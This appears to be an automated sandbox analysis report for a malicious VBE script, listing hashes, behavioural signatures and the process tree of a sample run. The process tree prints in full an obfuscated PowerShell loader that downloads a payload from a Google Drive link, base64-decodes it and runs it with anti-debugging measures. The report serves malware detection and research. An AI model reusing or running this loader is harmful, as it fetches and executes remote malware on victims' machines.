Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
23/05/2024, 14:16
Static task
static1
Behavioral task
behavioral1
Sample
383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe
Resource
win10v2004-20240508-en
General
-
Target
383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe
-
Size
5KB
-
MD5
ee79e648e91b1ce814880ccde05bc2f5
-
SHA1
7b42afec990d74d33d650d4d82b85057f30fad0c
-
SHA256
383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3
-
SHA512
769dae3c283203508d24e1edf4b4619498db1af9f2ca90dedbbf538ec15d5ff9d25a912a1c12221dc6cef3af1d41051bd15fea827f310aaacc2554d220ae3ad8
-
SSDEEP
96:Q1k8HdF1YeCbuTUtYX3Mu0sTwsZ0pstwIjzSv+vvddxDpE5IHf0d21XmwDCToWHO:QHHj0tQ3z0sZwstwIjzyYvddxDa5IHfL
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 3004 powershell.exe 7 3004 powershell.exe 9 3004 powershell.exe 12 3004 powershell.exe 14 3004 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2776 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3004 powershell.exe 2776 powershell.exe 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2044 wrote to memory of 3004 2044 WScript.exe 29 PID 2044 wrote to memory of 3004 2044 WScript.exe 29 PID 2044 wrote to memory of 3004 2044 WScript.exe 29 PID 3004 wrote to memory of 2676 3004 powershell.exe 31 PID 3004 wrote to memory of 2676 3004 powershell.exe 31 PID 3004 wrote to memory of 2676 3004 powershell.exe 31 PID 3004 wrote to memory of 2776 3004 powershell.exe 32 PID 3004 wrote to memory of 2776 3004 powershell.exe 32 PID 3004 wrote to memory of 2776 3004 powershell.exe 32 PID 3004 wrote to memory of 2776 3004 powershell.exe 32 PID 2776 wrote to memory of 1992 2776 powershell.exe 33 PID 2776 wrote to memory of 1992 2776 powershell.exe 33 PID 2776 wrote to memory of 1992 2776 powershell.exe 33 PID 2776 wrote to memory of 1992 2776 powershell.exe 33 PID 2776 wrote to memory of 2208 2776 powershell.exe 34 PID 2776 wrote to memory of 2208 2776 powershell.exe 34 PID 2776 wrote to memory of 2208 2776 powershell.exe 34 PID 2776 wrote to memory of 2208 2776 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe"1⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Cuarenta = 1;$Snerydde='Sub';$Snerydde+='strin';$Snerydde+='g';Function Sydslesvigsk($Khalifs){$Unspared98=$Khalifs.Length-$Cuarenta;For($Telefonisterne=1;$Telefonisterne -lt $Unspared98;$Telefonisterne+=2){$Unsurmounted+=$Khalifs.$Snerydde.Invoke( $Telefonisterne, $Cuarenta);}$Unsurmounted;}function brndforgiftnings($Baccar50){& ($Naturfredningsforenings) ($Baccar50);}$Gesneriaceae=Sydslesvigsk ' M oKzFiHl lMa /S5 .C0P .(QWJiHnCdaocwYs NBT 1S0,.P0S;. WFi,n 6C4 ;M Gx 6 4 ;C Ir.vP: 1O2R1 . 0G), G e c kSo,/D2 0.1F0P0f1P0P1b fF.i rEeUf,oKx /K1E2A1B.L0M ';$Bagsderyglnet=Sydslesvigsk ' UBs e rN-KATg.epn.tH ';$Interessentselskaber136=Sydslesvigsk '.hOt.t,p,s,:B/C/.dBr.iAvSe ..gSoCo,gVlLe,.,c oTmB/Du c ?ue.x p.oSr.t = dNoMwOnAlSo.a dK&DiLdB=O1U6LUBB L.jUa VBWUQ n 1FXU_ M ITS L,4N9 y a,2 h.KMB e,m jFj,X.SD0 ';$Uskrevet=Sydslesvigsk 'E> ';$Naturfredningsforenings=Sydslesvigsk 'Ri e xe ';$Rottweileren='Spilerens';$Gratias = Sydslesvigsk 'Pe c hAo ,%LaPp p dPa.tAaB%A\ RTu dRk.b.iKnRgae nDsBe rP.FUTdrv & &R .e c h,o. Stp ';brndforgiftnings (Sydslesvigsk ' $ gBl,o,bCa l :RFSi l.t.eNrPpfr.o.gPrCa m m,e tW=S(.c.mSd, /ScL O$DGGr a t iMaTs )V ');brndforgiftnings (Sydslesvigsk ' $VgOlAo.b aRlt:SP,hSa gSe d aXe.nRiBc a l.=E$SIDnJtCe,rLePsSs,eQnBt sKeDlAsKkTa.bOe rF1 3M6,. sEpPl,i.tP(K$IU.sPkSr e vEeLt )L ');$Interessentselskaber136=$Phagedaenical[0];$Cartelize= (Sydslesvigsk 'H$.gSl o b.aOl :,N eBdBk,mSp eId e =,N eKwT- ORb.j e.cNt RS yFsGtSe,mP..N e tH.SWTeGb CHlCiFeAnCt');$Cartelize+=$Filterprogrammet[1];brndforgiftnings ($Cartelize);brndforgiftnings (Sydslesvigsk ' $SN,eLd kSm p e dUe,.KH e a.d eKr,s [.$ B.aNg sedReTr.y,gSlRn,eSt.] = $,G eBs,nFe r iUaMc emaKe ');$Bifangsternes=Sydslesvigsk ' $SN e d k m p eSdAea. DToUwKn.lPo,a dAFEi lRe,( $FI,nStEeGr.e s.sBesnAt,s eFlSs k a bTe.r 1T3I6P,C$MSGuDbOsSt a.l,aSgSmCiCt e,)P ';$Substalagmite=$Filterprogrammet[0];brndforgiftnings (Sydslesvigsk 'P$ng l.o b a lA:PA mSbUu l.o m a n c yL= (PTCe.sBtP- P aCtNhD B$.S.u.bjsHtCaCl aFg.m,i t eD). ');while (!$Ambulomancy) {brndforgiftnings (Sydslesvigsk 'L$SgSlRoSb.a lS:.MDi a =,$AtWr.u eI ') ;brndforgiftnings $Bifangsternes;brndforgiftnings (Sydslesvigsk ' SEt aAr tA-US.l e eBp B4D ');brndforgiftnings (Sydslesvigsk 'M$Mg.l,o,bFaIl,:DAAmDb uVlBo,mOaSn c y,= (FT,eIsmt -.P aCt hP N$ S uUbHs tRaOlNa,g m iMtSe ) ') ;brndforgiftnings (Sydslesvigsk ' $ g lRo b a l : G.aEs e,nM= $ gPlMo b aTl.:MAKc hui nFeBs sF+M+M%V$FP,h.a g.e dTa eNn i.cFa.l,..c oPu nBtR ') ;$Interessentselskaber136=$Phagedaenical[$Gasen];}$aiery=384974;$Clockcase=25303;brndforgiftnings (Sydslesvigsk 'D$Ng l oCbEa,l : OBpFkSr,vpetnVdGe sC = aG eAt -TC oGnHt e n tU .$.S.udb.s t aNlbaUgKmCiLt eT ');brndforgiftnings (Sydslesvigsk 'd$,gFl,oPb a l :AE sAkOa p ils,tAi,s kR .=D U[FSAy,s t eUmG.ICMoAnPvTeLrrt ] :,: F,rFo.mEBdaKsBe 6 4.S t,rPiPn ga(S$POUpRkSrTvPe nJd e s )I ');brndforgiftnings (Sydslesvigsk ',$.gOl oSbKa lL: FFiSsOkDeCp,r oHd,uFk,tSe r sI Y=L ,[.S.yBsStCeBmL.BT.e,x,tS.LE,nOc,oSdDi n gA]O:.: AUS C,I I .BG,e t,S t.r.i,n g (,$NE s kUaOp.i.sStIiOsAk )A ');brndforgiftnings (Sydslesvigsk 'S$AgNlPoDb aGl :TB,e lSi nBeP= $ FFi.sukBeApMr,oHdMu k tUeSr sS.as uLb s t.rPiNnBg (C$DasiMe,rTy ,,$.C,lgo cOkBc a s.eA)C ');brndforgiftnings $Beline;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rudkbingenser.Udv && echo t"3⤵PID:2676
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Cuarenta = 1;$Snerydde='Sub';$Snerydde+='strin';$Snerydde+='g';Function Sydslesvigsk($Khalifs){$Unspared98=$Khalifs.Length-$Cuarenta;For($Telefonisterne=1;$Telefonisterne -lt $Unspared98;$Telefonisterne+=2){$Unsurmounted+=$Khalifs.$Snerydde.Invoke( $Telefonisterne, $Cuarenta);}$Unsurmounted;}function brndforgiftnings($Baccar50){& ($Naturfredningsforenings) ($Baccar50);}$Gesneriaceae=Sydslesvigsk ' M oKzFiHl lMa /S5 .C0P .(QWJiHnCdaocwYs NBT 1S0,.P0S;. WFi,n 6C4 ;M Gx 6 4 ;C Ir.vP: 1O2R1 . 0G), G e c kSo,/D2 0.1F0P0f1P0P1b fF.i rEeUf,oKx /K1E2A1B.L0M ';$Bagsderyglnet=Sydslesvigsk ' UBs e rN-KATg.epn.tH ';$Interessentselskaber136=Sydslesvigsk '.hOt.t,p,s,:B/C/.dBr.iAvSe ..gSoCo,gVlLe,.,c oTmB/Du c ?ue.x p.oSr.t = dNoMwOnAlSo.a dK&DiLdB=O1U6LUBB L.jUa VBWUQ n 1FXU_ M ITS L,4N9 y a,2 h.KMB e,m jFj,X.SD0 ';$Uskrevet=Sydslesvigsk 'E> ';$Naturfredningsforenings=Sydslesvigsk 'Ri e xe ';$Rottweileren='Spilerens';$Gratias = Sydslesvigsk 'Pe c hAo ,%LaPp p dPa.tAaB%A\ RTu dRk.b.iKnRgae nDsBe rP.FUTdrv & &R .e c h,o. Stp ';brndforgiftnings (Sydslesvigsk ' $ gBl,o,bCa l :RFSi l.t.eNrPpfr.o.gPrCa m m,e tW=S(.c.mSd, /ScL O$DGGr a t iMaTs )V ');brndforgiftnings (Sydslesvigsk ' $VgOlAo.b aRlt:SP,hSa gSe d aXe.nRiBc a l.=E$SIDnJtCe,rLePsSs,eQnBt sKeDlAsKkTa.bOe rF1 3M6,. sEpPl,i.tP(K$IU.sPkSr e vEeLt )L ');$Interessentselskaber136=$Phagedaenical[0];$Cartelize= (Sydslesvigsk 'H$.gSl o b.aOl :,N eBdBk,mSp eId e =,N eKwT- ORb.j e.cNt RS yFsGtSe,mP..N e tH.SWTeGb CHlCiFeAnCt');$Cartelize+=$Filterprogrammet[1];brndforgiftnings ($Cartelize);brndforgiftnings (Sydslesvigsk ' $SN,eLd kSm p e dUe,.KH e a.d eKr,s [.$ B.aNg sedReTr.y,gSlRn,eSt.] = $,G eBs,nFe r iUaMc emaKe ');$Bifangsternes=Sydslesvigsk ' $SN e d k m p eSdAea. DToUwKn.lPo,a dAFEi lRe,( $FI,nStEeGr.e s.sBesnAt,s eFlSs k a bTe.r 1T3I6P,C$MSGuDbOsSt a.l,aSgSmCiCt e,)P ';$Substalagmite=$Filterprogrammet[0];brndforgiftnings (Sydslesvigsk 'P$ng l.o b a lA:PA mSbUu l.o m a n c yL= (PTCe.sBtP- P aCtNhD B$.S.u.bjsHtCaCl aFg.m,i t eD). ');while (!$Ambulomancy) {brndforgiftnings (Sydslesvigsk 'L$SgSlRoSb.a lS:.MDi a =,$AtWr.u eI ') ;brndforgiftnings $Bifangsternes;brndforgiftnings (Sydslesvigsk ' SEt aAr tA-US.l e eBp B4D ');brndforgiftnings (Sydslesvigsk 'M$Mg.l,o,bFaIl,:DAAmDb uVlBo,mOaSn c y,= (FT,eIsmt -.P aCt hP N$ S uUbHs tRaOlNa,g m iMtSe ) ') ;brndforgiftnings (Sydslesvigsk ' $ g lRo b a l : G.aEs e,nM= $ gPlMo b aTl.:MAKc hui nFeBs sF+M+M%V$FP,h.a g.e dTa eNn i.cFa.l,..c oPu nBtR ') ;$Interessentselskaber136=$Phagedaenical[$Gasen];}$aiery=384974;$Clockcase=25303;brndforgiftnings (Sydslesvigsk 'D$Ng l oCbEa,l : OBpFkSr,vpetnVdGe sC = aG eAt -TC oGnHt e n tU .$.S.udb.s t aNlbaUgKmCiLt eT ');brndforgiftnings (Sydslesvigsk 'd$,gFl,oPb a l :AE sAkOa p ils,tAi,s kR .=D U[FSAy,s t eUmG.ICMoAnPvTeLrrt ] :,: F,rFo.mEBdaKsBe 6 4.S t,rPiPn ga(S$POUpRkSrTvPe nJd e s )I ');brndforgiftnings (Sydslesvigsk ',$.gOl oSbKa lL: FFiSsOkDeCp,r oHd,uFk,tSe r sI Y=L ,[.S.yBsStCeBmL.BT.e,x,tS.LE,nOc,oSdDi n gA]O:.: AUS C,I I .BG,e t,S t.r.i,n g (,$NE s kUaOp.i.sStIiOsAk )A ');brndforgiftnings (Sydslesvigsk 'S$AgNlPoDb aGl :TB,e lSi nBeP= $ FFi.sukBeApMr,oHdMu k tUeSr sS.as uLb s t.rPiNnBg (C$DasiMe,rTy ,,$.C,lgo cOkBc a s.eA)C ');brndforgiftnings $Beline;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rudkbingenser.Udv && echo t"4⤵PID:1992
-
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "2776" "1084"4⤵PID:2208
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5811ddad3a1b2ae5a3e9db23a43354a3f
SHA1109578f22ad08de26ff9011643950379bb6d6d2f
SHA256df4ccbdfcd6f79e38a382815decc21c8aad4c2086bc289c640835ba1b6ecfd73
SHA512219c57a0e4e8f46a2508cf2a97ca59e49f31dee92a5efe361cee1e50f24568576add5e21231400e11880eeb655566ecfa34e99a9f657ec29c547ec748ebf7d85
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BRCWQPEHR94L3KNWKB8Q.temp
Filesize7KB
MD51a4f65d42fec04f32d9d152d5f066826
SHA1c114ebb62e0d0476e0603202bb184bb6e5719a88
SHA256777ccda1cd897e71a4fe7f8b45277a11032863639cccd5283bc20ca7f34e46b9
SHA5122e57805f5b4266c7080b1a106cdd499d9bdebb940efcb23cdf8bfcd05f94c24d12576667add24743672bac61c2e64c311013c4233b0ce960bd7abf6338a459b3
-
Filesize
534KB
MD59954201e4cf053ed914a27ebc5c0afcb
SHA1c78635b446c8e6ce924f5eb5f186110eba6dbc34
SHA256816ab3bd778e5e1f8aa7d8e225b5de50e977990b2217ba2fe28c0a856ff5a2e1
SHA512cd8574c186fd9d45a7597068b5d66de81843cd9a2c593e5326e19f354f6d94e8739a81a141694d8741730cfb174cee797c316a7326d9bd01218e8c8c0452535d